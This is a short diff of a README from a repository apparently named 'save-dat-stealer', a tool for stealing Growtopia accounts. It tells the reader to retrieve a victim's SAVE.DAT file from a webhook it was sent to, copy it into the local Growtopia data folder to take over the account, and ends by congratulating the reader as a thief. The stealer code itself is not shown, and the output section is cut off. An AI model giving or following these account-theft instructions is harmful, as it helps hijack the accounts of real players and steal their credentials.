FrenzY8/save-dat-stealer/README.md

 steal account. and already logged in your webhook, you can download the victim's ```SAVE.DAT``` file and transfer it to your growtopia data
 - > Path: ```C:/Users/PC-NAME/AppData/Local/Growtopia```
 - or right click on ```Growtopia``` then paste the victims save.dat
 - AND CONGRATS!
-YOU'RE THIEF!!
+YOU'RE THIEF!

 # output
 ```js